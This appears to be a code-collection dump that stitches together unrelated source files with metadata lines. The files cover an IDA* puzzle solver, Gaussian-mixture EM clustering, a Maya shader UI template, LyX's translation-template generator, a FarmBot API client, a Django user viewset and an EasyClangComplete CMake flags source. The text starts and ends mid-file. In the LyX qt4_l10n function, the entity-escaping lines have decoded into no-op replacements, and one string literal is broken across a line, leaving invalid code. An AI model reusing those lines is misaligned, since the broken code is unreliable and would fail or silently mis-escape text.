for i, node in enumerate(path[1:]):
temp = np.where(node == 0) # find the blank
blank = (temp[0][0], temp[1][0]) # blank's position
actions.append(path[i][blank])
return actions
if __name__ == '__main__':
print('***STARTING***', datetime.datetime.now().strftime('%Y.%m.%d %H:%M:%S'))
filename = 'mytest.txt'
puzzle = np.loadtxt(filename, dtype=np.uint8) # number 0 indicates the blank
sidelen = len(puzzle) # side length of puzzle
result = makeActions(ida_star(puzzle))
print(result)
print('Length:', len(result))
print('***Finished***', datetime.datetime.now().strftime('%Y.%m.%d %H:%M:%S'))
```
#### File: E13_EM/src/ggm_em.py
```python
import numpy as np
import matplotlib.pyplot as plt
# In[2]:
def loadData(filename):
"""从文件中读取数据。"""
dataSet = []
id2country = [] # 将索引对应到国家名
with open(filename) as fr:
for i, line in enumerate(fr.readlines()):
curLine = line.strip().split(' ')
fltLine = list(map(int, curLine[1:])) # 去掉第一列国家名
dataSet.append(fltLine)
id2country.append(curLine[0])
return dataSet, id2country
# In[3]:
def prob(x, mu, sigma):
"""高斯分布的概率密度函数。"""
n = np.shape(x)[1]
expOn = float(-0.5 * (x - mu) * (sigma.I) * ((x - mu).T))
divBy = pow(2 * np.pi, n / 2) * pow(np.linalg.det(sigma), 0.5)
return pow(np.e, expOn) / divBy
# In[4]:
def EM(dataMat, maxIter=50):
m, n = np.shape(dataMat)
# 1.初始化各高斯混合成分参数
alpha = [1/3, 1/3, 1/3] # 初始化 alpha
mu = [dataMat[1, :], dataMat[13, :], dataMat[11, :]] # 初始化mu
sigma = [np.mat((np.eye(7, dtype=float))) for x in range(3)] # 初始化协方差矩阵
gamma = np.mat(np.zeros((m, 3)))
for i in range(maxIter):
for j in range(m):
sumAlphaMulP = 0
for k in range(3):
gamma[j, k] = alpha[k] * prob(dataMat[j, :], mu[k], sigma[k]) # 4.计算混合成分生成的后验概率,即gamma
sumAlphaMulP += gamma[j, k]
for k in range(3):
gamma[j, k] /= sumAlphaMulP
sumGamma = np.sum(gamma, axis=0)
for k in range(3):
mu[k] = np.mat(np.zeros((1, n)))
sigma[k] = np.mat(np.zeros((n, n)))
for j in range(m):
mu[k] += gamma[j, k] * dataMat[j, :]
mu[k] /= sumGamma[0, k] # 7.计算新均值向量
for j in range(m):
sigma[k] += gamma[j, k] * (dataMat[j, :] - mu[k]).T *(dataMat[j, :] - mu[k])
sigma[k] /= sumGamma[0, k] # 8. 计算新的协方差矩阵
alpha[k] = sumGamma[0, k] / m # 9. 计算新混合系数
for s in sigma:
s += np.eye(7)
print('gamma')
[print(g) for g in gamma]
print('\nmu')
[print(m) for m in mu]
print('\nsigma')
[print(s) for s in sigma]
return gamma
# In[5]:
def initCentroids(dataMat, k):
"""Init centroids with random samples."""
numSamples, dim = dataMat.shape
centroids = np.zeros((k, dim))
for i in range(k):
index = int(np.random.uniform(0, numSamples))
centroids[i, :] = dataMat[index, :]
return centroids
# In[6]:
def gaussianCluster(dataMat):
"""进行聚类。"""
m, n = np.shape(dataMat)
centroids = initCentroids(dataMat, m) ## step 1: init centroids
clusterAssign = np.mat(np.zeros((m, 2)))
gamma = EM(dataMat)
for i in range(m):
# amx返回矩阵最大值,argmax返回矩阵最大值所在下标
clusterAssign[i, :] = np.argmax(gamma[i, :]), np.amax(gamma[i, :]) # 15.确定x的簇标记lambda
## step 4: update centroids
for j in range(m):
pointsInCluster = dataMat[np.nonzero(clusterAssign[:, 0].A == j)[0]]
centroids[j, :] = np.mean(pointsInCluster, axis=0) # 计算出均值向量
return centroids, clusterAssign
# In[7]:
dataMat, id2country = loadData('football.txt')
dataMat = np.mat(dataMat)
centroids, clusterAssign = gaussianCluster(dataMat)
# In[8]:
result = ([], [], [])
for i, assign in enumerate(clusterAssign):
result[int(assign[0, 0])].append(id2country[i])
print('\n-------------------------------------------\n')
print('First-class:', result[0])
print('Second-class:', result[1])
print('Third-class:', result[2])
# In[ ]:
```
|
{
"source": "Jedzia/alShaders",
"score": 2
}
|
#### File: alShaders/common/alShaders.py
```python
import pymel.core as pm
from mtoa.ui.ae.shaderTemplate import ShaderAETemplate
UI = {
'float': pm.attrFieldSliderGrp,
'rgb': pm.attrColorSliderGrp,
}
class Param:
name = ''
label = ''
annotation = ''
ptype = ''
presets = None
precision = 4
def __init__(self, n, l, a, p, presets=None, precision=4):
self.name = n
self.label = l
self.annotation = a
self.ptype = p
self.presets = presets
self.precision = precision
def setPresetFlt(ctrl, value):
attr = pm.attrFieldSliderGrp(ctrl, query=True, attribute=True)
pm.setAttr(attr, value)
def setPresetRgb(ctrl, value):
attr = pm.attrColorSliderGrp(ctrl, query=True, attribute=True)
pm.setAttr(attr + 'R', value[0])
pm.setAttr(attr + 'G', value[1])
pm.setAttr(attr + 'B', value[2])
class alShadersTemplate(ShaderAETemplate):
def customCreateFlt(self, attr):
# print "creating %s" % attr
pname = attr.split('.')[-1]
ptype = self.params[pname].ptype
plabel = self.params[pname].label
pann = self.params[pname].annotation
presets = self.params[pname].presets
precision = self.params[pname].precision
controlName = pname + 'Ctrl'
l = plabel
if presets is not None:
l += ' <span>≡</span>' # fix unicode problem in Windows using html
pm.attrFieldSliderGrp(controlName, attribute=attr, label=l, annotation=pann, precision=precision)
if presets is not None:
# pm.attrFieldSliderGrp(controlName, edit=True)
# pm.popupMenu()
# for k in sorted(presets, key=presets.get):
# pm.menuItem(label=k, command=pm.Callback(setPresetFlt, controlName, presets[k]))
attrChildren = pm.layout(controlName, query=True, childArray=True)
pm.popupMenu(button=1, parent=attrChildren[0])
for k in sorted(presets, key=presets.get):
pm.menuItem(label=k, command=pm.Callback(setPresetFlt, controlName, presets[k]))
def customUpdateFlt(self, attr):
# print "updating attr %s" % attr
pname = attr.split('.')[-1]
ptype = self.params[pname].ptype
controlName = pname + 'Ctrl'
pm.attrFieldSliderGrp(controlName, edit=True, attribute=attr)
def customCreateRgb(self, attr):
pname = attr.split('.')[-1]
ptype = self.params[pname].ptype
plabel = self.params[pname].label
pann = self.params[pname].annotation
presets = self.params[pname].presets
controlName = pname + 'Ctrl'
l = plabel
if presets is not None:
l += ' <span>≡</span>' # fix unicode problem in Windows using html
pm.attrColorSliderGrp(controlName, attribute=attr, label=l, annotation=pann)
if presets is not None:
# pm.attrColorSliderGrp(controlName, edit=True)
# pm.popupMenu()
attrChildren = pm.layout(controlName, query=True, childArray=True)
pm.popupMenu(button=1, parent=attrChildren[0])
for k in sorted(presets):
pm.menuItem(label=k, command=pm.Callback(setPresetRgb, controlName, presets[k]))
def customUpdateRgb(self, attr):
pname = attr.split('.')[-1]
ptype = self.params[pname].ptype
controlName = pname + 'Ctrl'
pm.attrColorSliderGrp(controlName, edit=True, attribute=attr)
def addCustomFlt(self, param):
self.addCustom(param, self.customCreateFlt, self.customUpdateFlt)
def addCustomRgb(self, param):
self.addCustom(param, self.customCreateRgb, self.customUpdateRgb)
def addRemapControls(self):
self.beginLayout('Remap', collapse=True)
self.addControl('RMPinputMin', label='Input min')
self.addControl('RMPinputMax', label='Input max')
self.beginLayout('Contrast', collapse=False)
self.addControl('RMPcontrast', label='Contrast')
self.addControl('RMPcontrastPivot', label='Pivot')
self.endLayout() # end Contrast
self.beginLayout('Bias and gain', collapse=False)
self.addControl('RMPbias', label='Bias')
self.addControl('RMPgain', label='Gain')
self.endLayout() # end Bias and gain
self.addControl('RMPoutputMin', label='Output min')
self.addControl('RMPoutputMax', label='Output max')
self.beginLayout('Clamp', collapse=False)
self.addControl('RMPclampEnable', label='Enable')
self.addControl('RMPthreshold', label='Expand')
self.addControl('RMPclampMin', label='Min')
self.addControl('RMPclampMax', label='Max')
self.endLayout() # end Clamp
self.endLayout() # end Remap
```
|
{
"source": "Jedzia/FernseherTest",
"score": 2
}
|
#### File: cmake/po/lyx_pot.py
```python
import sys, os, re, getopt
if sys.version_info < (2, 4, 0):
from sets import Set as set
def relativePath(path, base):
'''return relative path from top source dir'''
# full pathname of path
path1 = os.path.normpath(os.path.realpath(path)).split(os.sep)
path2 = os.path.normpath(os.path.realpath(base)).split(os.sep)
if path1[:len(path2)] != path2:
print "Path %s is not under top source directory" % path
path3 = os.path.join(*path1[len(path2):]);
# replace all \ by / such that we get the same comments on Windows and *nix
path3 = path3.replace('\\', '/')
return path3
def writeString(outfile, infile, basefile, lineno, string):
string = string.replace('\\', '\\\\').replace('"', '')
if string == "":
return
print >> outfile, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(infile, basefile), lineno, string)
def ui_l10n(input_files, output, base):
'''Generate pot file from lib/ui/*'''
output = open(output, 'w')
Submenu = re.compile(r'^[^#]*Submenu\s+"([^"]*)"', re.IGNORECASE)
Popupmenu = re.compile(r'^[^#]*PopupMenu\s+"[^"]+"\s+"([^"]*)"', re.IGNORECASE)
IconPalette = re.compile(r'^[^#]*IconPalette\s+"[^"]+"\s+"([^"]*)"', re.IGNORECASE)
Toolbar = re.compile(r'^[^#]*Toolbar\s+"[^"]+"\s+"([^"]*)"', re.IGNORECASE)
Item = re.compile(r'[^#]*Item\s+"([^"]*)"', re.IGNORECASE)
TableInsert = re.compile(r'[^#]*TableInsert\s+"([^"]*)"', re.IGNORECASE)
for src in input_files:
input = open(src)
for lineno, line in enumerate(input.readlines()):
if Submenu.match(line):
(string,) = Submenu.match(line).groups()
string = string.replace('_', ' ')
elif Popupmenu.match(line):
(string,) = Popupmenu.match(line).groups()
elif IconPalette.match(line):
(string,) = IconPalette.match(line).groups()
elif Toolbar.match(line):
(string,) = Toolbar.match(line).groups()
elif Item.match(line):
(string,) = Item.match(line).groups()
elif TableInsert.match(line):
(string,) = TableInsert.match(line).groups()
else:
continue
string = string.replace('"', '')
if string != "":
print >> output, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(src, base), lineno+1, string)
input.close()
output.close()
def layouts_l10n(input_files, output, base, layouttranslations):
'''Generate pot file from lib/layouts/*.{layout,inc,module}'''
Style = re.compile(r'^\s*Style\s+(.*)\s*$', re.IGNORECASE)
# match LabelString, EndLabelString, LabelStringAppendix and maybe others but no comments
LabelString = re.compile(r'^[^#]*LabelString\S*\s+(.*)\s*$', re.IGNORECASE)
GuiName = re.compile(r'^\s*GuiName\s+(.*)\s*$', re.IGNORECASE)
ListName = re.compile(r'^\s*ListName\s+(.*)\s*$', re.IGNORECASE)
CategoryName = re.compile(r'^\s*Category\s+(.*)\s*$', re.IGNORECASE)
NameRE = re.compile(r'^\s*#\s*\\DeclareLyXModule.*{(.*)}$', re.IGNORECASE)
InsetLayout = re.compile(r'^InsetLayout\s+\"?(.*)\"?\s*$', re.IGNORECASE)
FlexCheck = re.compile(r'^Flex:(.*)', re.IGNORECASE)
DescBegin = re.compile(r'^\s*#DescriptionBegin\s*$', re.IGNORECASE)
DescEnd = re.compile(r'^\s*#\s*DescriptionEnd\s*$', re.IGNORECASE)
Category = re.compile(r'^\s*#\s*Category:\s+(.*)\s*$', re.IGNORECASE)
I18nPreamble = re.compile(r'^\s*((Lang)|(Babel))Preamble\s*$', re.IGNORECASE)
EndI18nPreamble = re.compile(r'^\s*End((Lang)|(Babel))Preamble\s*$', re.IGNORECASE)
I18nString = re.compile(r'_\(([^\)]+)\)')
CounterFormat = re.compile(r'^\s*PrettyFormat\s+"?(.*)"?\s*$', re.IGNORECASE)
CiteFormat = re.compile(r'^\s*CiteFormat', re.IGNORECASE)
KeyVal = re.compile(r'^\s*_\w+\s+(.*)\s*$')
Float = re.compile(r'^\s*Float\s*$', re.IGNORECASE)
UsesFloatPkg = re.compile(r'^\s*UsesFloatPkg\s+(.*)\s*$', re.IGNORECASE)
IsPredefined = re.compile(r'^\s*IsPredefined\s+(.*)\s*$', re.IGNORECASE)
End = re.compile(r'^\s*End', re.IGNORECASE)
Comment = re.compile(r'^(.*)#')
Translation = re.compile(r'^\s*Translation\s+(.*)\s*$', re.IGNORECASE)
KeyValPair = re.compile(r'\s*"(.*)"\s+"(.*)"')
oldlanguages = []
languages = []
keyset = set()
oldtrans = dict()
if layouttranslations:
linguas_file = os.path.join(base, 'LINGUAS')
for line in open(linguas_file).readlines():
res = Comment.search(line)
if res:
line = res.group(1)
if line.strip() != '':
languages.extend(line.split())
# read old translations if available
try:
input = open(output)
lang = ''
for line in input.readlines():
res = Comment.search(line)
if res:
line = res.group(1)
if line.strip() == '':
continue
res = Translation.search(line)
if res:
lang = res.group(1)
if lang not in languages:
oldlanguages.append(lang)
languages.append(lang)
oldtrans[lang] = dict()
continue
res = End.search(line)
if res:
lang = ''
continue
res = KeyValPair.search(line)
if res and lang != '':
key = res.group(1).decode('utf-8')
val = res.group(2).decode('utf-8')
key = key.replace('\\"', '"').replace('\\\\', '\\')
val = val.replace('\\"', '"').replace('\\\\', '\\')
oldtrans[lang][key] = val
keyset.add(key)
continue
print "Error: Unable to handle line:"
print line
except IOError:
print "Warning: Unable to open %s for reading." % output
print " Old translations will be lost."
# walon is not a known document language
# FIXME: Do not hardcode, read from lib/languages!
if 'wa' in languages:
languages.remove('wa')
out = open(output, 'w')
for src in input_files:
readingDescription = False
readingI18nPreamble = False
readingFloat = False
readingCiteFormats = False
isPredefined = False
usesFloatPkg = True
listname = ''
floatname = ''
descStartLine = -1
descLines = []
lineno = 0
for line in open(src).readlines():
lineno += 1
if readingDescription:
res = DescEnd.search(line)
if res != None:
readingDescription = False
desc = " ".join(descLines)
if not layouttranslations:
writeString(out, src, base, lineno + 1, desc)
continue
descLines.append(line[1:].strip())
continue
res = DescBegin.search(line)
if res != None:
readingDescription = True
descStartLine = lineno
continue
if readingI18nPreamble:
res = EndI18nPreamble.search(line)
if res != None:
readingI18nPreamble = False
continue
res = I18nString.search(line)
if res != None:
string = res.group(1)
if layouttranslations:
keyset.add(string)
else:
writeString(out, src, base, lineno, string)
continue
res = I18nPreamble.search(line)
if res != None:
readingI18nPreamble = True
continue
res = NameRE.search(line)
if res != None:
string = res.group(1)
if not layouttranslations:
writeString(out, src, base, lineno + 1, string)
continue
res = Style.search(line)
if res != None:
string = res.group(1)
string = string.replace('_', ' ')
# Style means something else inside a float definition
if not readingFloat:
if not layouttranslations:
writeString(out, src, base, lineno, string)
continue
res = LabelString.search(line)
if res != None:
string = res.group(1)
if not layouttranslations:
writeString(out, src, base, lineno, string)
continue
res = GuiName.search(line)
if res != None:
string = res.group(1)
if layouttranslations:
# gui name must only be added for floats
if readingFloat:
floatname = string
else:
writeString(out, src, base, lineno, string)
continue
res = CategoryName.search(line)
if res != None:
string = res.group(1)
if not layouttranslations:
writeString(out, src, base, lineno, string)
continue
res = ListName.search(line)
if res != None:
string = res.group(1)
if layouttranslations:
listname = string.strip('"')
else:
writeString(out, src, base, lineno, string)
continue
res = InsetLayout.search(line)
if res != None:
string = res.group(1)
string = string.replace('_', ' ')
#Flex:xxx is not used in translation
#if not layouttranslations:
# writeString(out, src, base, lineno, string)
m = FlexCheck.search(string)
if m:
if not layouttranslations:
writeString(out, src, base, lineno, m.group(1))
continue
res = Category.search(line)
if res != None:
string = res.group(1)
if not layouttranslations:
writeString(out, src, base, lineno, string)
continue
res = CounterFormat.search(line)
if res != None:
string = res.group(1)
if not layouttranslations:
writeString(out, src, base, lineno, string)
continue
res = Float.search(line)
if res != None:
readingFloat = True
continue
res = IsPredefined.search(line)
if res != None:
string = res.group(1).lower()
if string == 'true':
isPredefined = True
else:
isPredefined = False
continue
res = UsesFloatPkg.search(line)
if res != None:
string = res.group(1).lower()
if string == 'true':
usesFloatPkg = True
else:
usesFloatPkg = False
continue
res = CiteFormat.search(line)
if res != None:
readingCiteFormats = True
continue
res = End.search(line)
if res != None:
# If a float is predefined by the package and it does not need
# the float package then it uses the standard babel translations.
# This is even true for MarginFigure, MarginTable (both from
# tufte-book.layout) and Planotable, Plate (both from aguplus.inc).
if layouttranslations and readingFloat and usesFloatPkg and not isPredefined:
if floatname != '':
keyset.add(floatname)
if listname != '':
keyset.add(listname)
isPredefined = False
usesFloatPkg = True
listname = ''
floatname = ''
readingCiteFormats = False
readingFloat = False
continue
if readingCiteFormats:
res = KeyVal.search(line)
if res != None:
val = res.group(1)
if not layouttranslations:
writeString(out, src, base, lineno, val)
if layouttranslations:
# Extract translations of layout files
import polib
# Sort languages and key to minimize the diff between different runs
# with changed translations
languages.sort()
keys = []
for key in keyset:
keys.append(key)
keys.sort()
print >> out, '''# This file has been automatically generated by po/lyx_pot.py.
# PLEASE MODIFY ONLY THE LAGUAGES HAVING NO .po FILE! If you want to regenerate
# this file from the translations, run `make ../lib/layouttranslations' in po.
# Python polib library is needed for building the output file.
#
# This file should remain fixed during minor LyX releases.
# For more comments see README.localization file.'''
for lang in languages:
print >> out, '\nTranslation %s' % lang
if lang in oldtrans.keys():
trans = oldtrans[lang]
else:
trans = dict()
if not lang in oldlanguages:
poname = os.path.join(base, 'po/' + lang + '.po')
po = polib.pofile(poname)
# Iterate through po entries and not keys for speed reasons.
# FIXME: The code is still too slow
for entry in po:
if not entry.translated():
continue
if entry.msgid in keys:
key = entry.msgid
val = entry.msgstr
# some translators keep untranslated entries
if val != key:
trans[key] = val
for key in keys:
if key in trans.keys():
val = trans[key].replace('\\', '\\\\').replace('"', '\\"')
key = key.replace('\\', '\\\\').replace('"', '\\"')
print >> out, '\t"%s" "%s"' % \
(key.encode('utf-8'), val.encode('utf-8'))
# also print untranslated entries to help translators
elif not lang in oldlanguages:
key = key.replace('\\', '\\\\').replace('"', '\\"')
print >> out, '\t"%s" "%s"' % \
(key.encode('utf-8'), key.encode('utf-8'))
print >> out, 'End'
out.close()
def qt4_l10n(input_files, output, base):
'''Generate pot file from src/frontends/qt4/ui/*.ui'''
output = open(output, 'w')
pat = re.compile(r'\s*<string>(.*)</string>')
prop = re.compile(r'\s*<property.*name.*=.*shortcut')
for src in input_files:
input = open(src)
skipNextLine = False
for lineno, line in enumerate(input.readlines()):
# skip the line after <property name=shortcut>
if skipNextLine:
skipNextLine = False
continue
if prop.match(line):
skipNextLine = True
continue
# get lines that match <string>...</string>
if pat.match(line):
(string,) = pat.match(line).groups()
string = string.replace('&', '&').replace('"', '"')
string = string.replace('<', '<').replace('>', '>')
string = string.replace('\\', '\\\\').replace('"', r'\"')
string = string.replace('
', r'\n')
print >> output, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(src, base), lineno+1, string)
input.close()
output.close()
def languages_l10n(input_files, output, base):
'''Generate pot file from lib/languages'''
out = open(output, 'w')
GuiName = re.compile(r'^[^#]*GuiName\s+(.*)', re.IGNORECASE)
for src in input_files:
descStartLine = -1
descLines = []
lineno = 0
for line in open(src).readlines():
lineno += 1
res = GuiName.search(line)
if res != None:
string = res.group(1)
writeString(out, src, base, lineno, string)
continue
out.close()
def external_l10n(input_files, output, base):
'''Generate pot file from lib/external_templates'''
output = open(output, 'w')
Template = re.compile(r'^Template\s+(.*)', re.IGNORECASE)
GuiName = re.compile(r'\s*GuiName\s+(.*)', re.IGNORECASE)
HelpTextStart = re.compile(r'\s*HelpText\s', re.IGNORECASE)
HelpTextSection = re.compile(r'\s*(\S.*)\s*$')
HelpTextEnd = re.compile(r'\s*HelpTextEnd\s', re.IGNORECASE)
i = -1
for src in input_files:
input = open(src)
inHelp = False
hadHelp = False
prev_help_string = ''
for lineno, line in enumerate(input.readlines()):
if Template.match(line):
(string,) = Template.match(line).groups()
elif GuiName.match(line):
(string,) = GuiName.match(line).groups()
elif inHelp:
if HelpTextEnd.match(line):
if hadHelp:
print >> output, '\nmsgstr ""\n'
inHelp = False
hadHelp = False
prev_help_string = ''
elif HelpTextSection.match(line):
(help_string,) = HelpTextSection.match(line).groups()
help_string = help_string.replace('"', '')
if help_string != "" and prev_help_string == '':
print >> output, '#: %s:%d\nmsgid ""\n"%s\\n"' % \
(relativePath(src, base), lineno+1, help_string)
hadHelp = True
elif help_string != "":
print >> output, '"%s\\n"' % help_string
prev_help_string = help_string
elif HelpTextStart.match(line):
inHelp = True
prev_help_string = ''
else:
continue
string = string.replace('"', '')
if string != "" and not inHelp:
print >> output, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(src, base), lineno+1, string)
input.close()
output.close()
def formats_l10n(input_files, output, base):
'''Generate pot file from configure.py'''
output = open(output, 'w')
GuiName = re.compile(r'.*\\Format\s+\S+\s+\S+\s+"([^"]*)"\s+(\S*)\s+.*', re.IGNORECASE)
GuiName2 = re.compile(r'.*\\Format\s+\S+\s+\S+\s+([^"]\S+)\s+(\S*)\s+.*', re.IGNORECASE)
input = open(input_files[0])
for lineno, line in enumerate(input.readlines()):
label = ""
labelsc = ""
if GuiName.match(line):
label = GuiName.match(line).group(1)
shortcut = GuiName.match(line).group(2).replace('"', '')
elif GuiName2.match(line):
label = GuiName2.match(line).group(1)
shortcut = GuiName2.match(line).group(2).replace('"', '')
else:
continue
label = label.replace('\\', '\\\\').replace('"', '')
if shortcut != "":
labelsc = label + "|" + shortcut
if label != "":
print >> output, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(input_files[0], base), lineno+1, label)
if labelsc != "":
print >> output, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(input_files[0], base), lineno+1, labelsc)
input.close()
output.close()
def encodings_l10n(input_files, output, base):
'''Generate pot file from lib/encodings'''
output = open(output, 'w')
# assuming only one encodings file
# Encoding utf8 utf8 "Unicode (utf8)" UTF-8 variable inputenc
reg = re.compile('Encoding [\w-]+\s+[\w-]+\s+"([\w \-\(\)]+)"\s+[\w-]+\s+(fixed|variable)\s+\w+.*')
input = open(input_files[0])
for lineno, line in enumerate(input.readlines()):
if not line.startswith('Encoding'):
continue
if reg.match(line):
print >> output, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(input_files[0], base), lineno+1, reg.match(line).groups()[0])
else:
print "Error: Unable to handle line:"
print line
# No need to abort if the parsing fails
# sys.exit(1)
input.close()
output.close()
Usage = '''
lyx_pot.py [-b|--base top_src_dir] [-o|--output output_file] [-h|--help] [-s|src_file filename] -t|--type input_type input_files
where
--base:
path to the top source directory. default to '.'
--output:
output pot file, default to './lyx.pot'
--src_file
filename that contains a list of input files in each line
--input_type can be
ui: lib/ui/*
layouts: lib/layouts/*
layouttranslations: create lib/layouttranslations from po/*.po and lib/layouts/*
qt4: qt4 ui files
languages: file lib/languages
encodings: file lib/encodings
external: external templates file
formats: formats predefined in lib/configure.py
'''
if __name__ == '__main__':
input_type = None
output = 'lyx.pot'
base = '.'
input_files = []
#
optlist, args = getopt.getopt(sys.argv[1:], 'ht:o:b:s:',
['help', 'type=', 'output=', 'base=', 'src_file='])
for (opt, value) in optlist:
if opt in ['-h', '--help']:
print Usage
sys.exit(0)
elif opt in ['-o', '--output']:
output = value
elif opt in ['-b', '--base']:
base = value
elif opt in ['-t', '--type']:
input_type = value
elif opt in ['-s', '--src_file']:
input_files = [f.strip() for f in open(value)]
if input_type not in ['ui', 'layouts', 'layouttranslations', 'qt4', 'languages', 'encodings', 'external', 'formats'] or output is None:
print 'Wrong input type or output filename.'
sys.exit(1)
input_files += args
if input_type == 'ui':
ui_l10n(input_files, output, base)
elif input_type == 'layouts':
layouts_l10n(input_files, output, base, False)
elif input_type == 'layouttranslations':
layouts_l10n(input_files, output, base, True)
elif input_type == 'qt4':
qt4_l10n(input_files, output, base)
elif input_type == 'external':
external_l10n(input_files, output, base)
elif input_type == 'formats':
formats_l10n(input_files, output, base)
elif input_type == 'encodings':
encodings_l10n(input_files, output, base)
else:
languages_l10n(input_files, output, base)
```
|
{
"source": "jedzky/ps2101",
"score": 3
}
|
#### File: ps2101/ps2101/farmbot_interface.py
```python
import requests
import json
import random
import os
import uuid
class Farmbot:
def plants(self, headers):
# Requests Farmbot plant's
r = requests.get('https://my.farm.bot/api/points', headers=headers)
# Handles if request has failed
if(r.status_code != 200):
return "error"
# Loads Json into objects
json_data = json.loads(r.content)
# Creates a list
col_values = []
# Fills list with only plants
for points in json_data:
if points['pointer_type'] == 'Plant':
col_values.append({'id': points['id'], 'name': points['name'], 'x': points['x'],'y': points['y'], 'z': points['z']})
return col_values
# Unfinished Function
def plant_images(self, headers):
r = requests.get('https://my.farm.bot/api/images', headers=headers)
if(r.status_code != 200):
return "error"
json_data = json.loads(r.content)
i = 0
list = []
for image in json_data:
if(i < 20):
url = image['attachment_url']
response = requests.get(url)
img_name = os.getcwd() + '\\images\\' + str(uuid.uuid4()) + '.jpg'
list.append(img_name)
open(str(img_name), 'wb').write(response.content)
i += 1
return list
def sensor_pin(self, headers):
r = requests.get('https://my.farm.bot/api/sensors', headers=headers)
if(r.status_code != 200):
return "error"
json_data = json.loads(r.content)
for tools in json_data:
if tools['label'] == 'Soil Sensor':
return tools['pin']
return -1
# Only grabs the latest
def latest_sensor_reading(self, headers, pin):
r = requests.get('https://my.farm.bot/api/sensor_readings', headers=headers)
if(r.status_code != 200):
return "error"
json_data = json.loads(r.content)
for readings in json_data:
if readings['pin'] == pin:
return (readings['value'])
return -1
def user_info(self, headers):
r = requests.get('https://my.farm.bot/api/users', headers=headers)
if(r.status_code != 200):
return "error"
json_data = json.loads(r.content)
return json_data[0]['id']
```
|
{
"source": "jee1mr/care",
"score": 2
}
|
#### File: users/api/views.py
```python
from django.contrib.auth import get_user_model
from rest_framework import status
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from users.api.serializers import UserSerializer
User = get_user_model()
class UserViewSet(viewsets.ModelViewSet):
"""
A viewset for viewing and manipulating user instances.
"""
serializer_class = UserSerializer
queryset = User.objects.filter(deleted=False)
lookup_field = "username"
def get_permissions(self):
if self.request.method == "POST":
self.permission_classes = (
IsAuthenticated,
IsAdminUser,
)
else:
self.permission_classes = (IsAuthenticated,)
return super().get_permissions()
def get_queryset(self):
if self.request.method == "DELETE" or self.request.method == "PUT":
return self.queryset.filter(id=self.request.user.id)
else:
return self.queryset
@action(detail=False, methods=["GET"])
def getcurrentuser(self, request):
return Response(
status=status.HTTP_200_OK,
data=self.serializer_class(request.user, context={"request": request}).data,
)
```
|
{
"source": "jeeb/EasyClangComplete",
"score": 3
}
|
#### File: plugin/flags_sources/cmake_file.py
```python
from .flags_source import FlagsSource
from .compilation_db import CompilationDb
from ..tools import File
from ..tools import Tools
from ..utils.singleton import CMakeFileCache
from ..utils.catkinizer import Catkinizer
from ..utils.search_scope import TreeSearchScope
from os import path
import logging
import re
import os
log = logging.getLogger("ECC")
class CMakeFile(FlagsSource):
"""Manages generating a compilation database with cmake.
Attributes:
_cache (dict): Cache of database filenames for each analyzed
CMakeLists.txt file and of CMakeLists.txt file paths for each
analyzed view path.
"""
_FILE_NAME = 'CMakeLists.txt'
_DEP_REGEX = re.compile(r'\"(.+\..+)\"')
def __init__(self,
include_prefixes,
prefix_paths,
flags,
cmake_binary,
header_to_source_mapping,
target_compilers,
lazy_flag_parsing):
"""Initialize a cmake-based flag storage.
Args:
include_prefixes (str[]): A List of valid include prefixes.
prefix_paths (str[]): A list of paths to append to
CMAKE_PREFIX_PATH before invoking cmake.
flags (str[]): flags to pass to CMake
"""
super().__init__(include_prefixes)
self._cache = CMakeFileCache()
self.__cmake_prefix_paths = prefix_paths
self.__cmake_flags = flags
self.__cmake_binary = cmake_binary
self.__header_to_source_mapping = header_to_source_mapping
self.__target_compilers = target_compilers
self.__lazy_flag_parsing = lazy_flag_parsing
def get_flags(self, file_path=None, search_scope=None):
"""Get flags for file.
Args:
file_path (None, optional): A path to the query file. This
function returns a list of flags for this specific file.
search_scope (SearchScope, optional): Where to search for a
CMakeLists.txt file.
Returns:
str[]: List of flags for this view, or all flags merged if this
view path is not found in the generated compilation db.
"""
# prepare search scope
search_scope = self._update_search_scope_if_needed(
search_scope, file_path)
# TODO(igor): probably can be simplified. Why do we need to load
# cached? should we just test if currently found one is in cache?
log.debug("[cmake]:[get]: for file %s", file_path)
cached_cmake_path = self._get_cached_from(file_path)
log.debug("[cmake]:[cached]: '%s'", cached_cmake_path)
current_cmake_file = File.search(
file_name=self._FILE_NAME,
search_scope=search_scope,
search_content=['project(', 'project ('])
if not current_cmake_file:
log.debug("No CMakeLists.txt file with 'project' in it found.")
return None
current_cmake_path = current_cmake_file.full_path
log.debug("[cmake]:[current]: '%s'", current_cmake_path)
parsed_before = current_cmake_path in self._cache
if parsed_before:
log.debug("[cmake]: found cached CMakeLists.txt.")
cached_cmake_path = current_cmake_path
# remember that for this file we have found this cmakelists
self._cache[file_path] = current_cmake_path
path_unchanged = (current_cmake_path == cached_cmake_path)
file_unchanged = File.is_unchanged(cached_cmake_path)
if path_unchanged and file_unchanged:
use_cached = True
if CMakeFile.__need_cmake_rerun(cached_cmake_path):
use_cached = False
if cached_cmake_path not in self._cache:
use_cached = False
if use_cached:
log.debug("[cmake]:[unchanged]: use existing db.")
db_file_path = self._cache[cached_cmake_path]
db = CompilationDb(
self._include_prefixes,
self.__header_to_source_mapping,
self.__lazy_flag_parsing)
db_search_scope = TreeSearchScope(
from_folder=path.dirname(db_file_path))
return db.get_flags(file_path, db_search_scope)
# Check if CMakeLists.txt is a catkin project and add needed settings.
catkinizer = Catkinizer(current_cmake_file)
catkinizer.catkinize_if_needed()
# Generate a new compilation database file and return flags from it.
log.debug("[cmake]:[generate new db]")
db_file = CMakeFile.__compile_cmake(
cmake_file=File(current_cmake_path),
cmake_binary=self.__cmake_binary,
prefix_paths=self.__cmake_prefix_paths,
flags=self.__cmake_flags,
target_compilers=self.__target_compilers)
if not db_file:
return None
if file_path:
# write the current cmake file to cache
self._cache[file_path] = current_cmake_path
self._cache[current_cmake_path] = db_file.full_path
File.update_mod_time(current_cmake_path)
db = CompilationDb(
self._include_prefixes,
self.__header_to_source_mapping,
self.__lazy_flag_parsing)
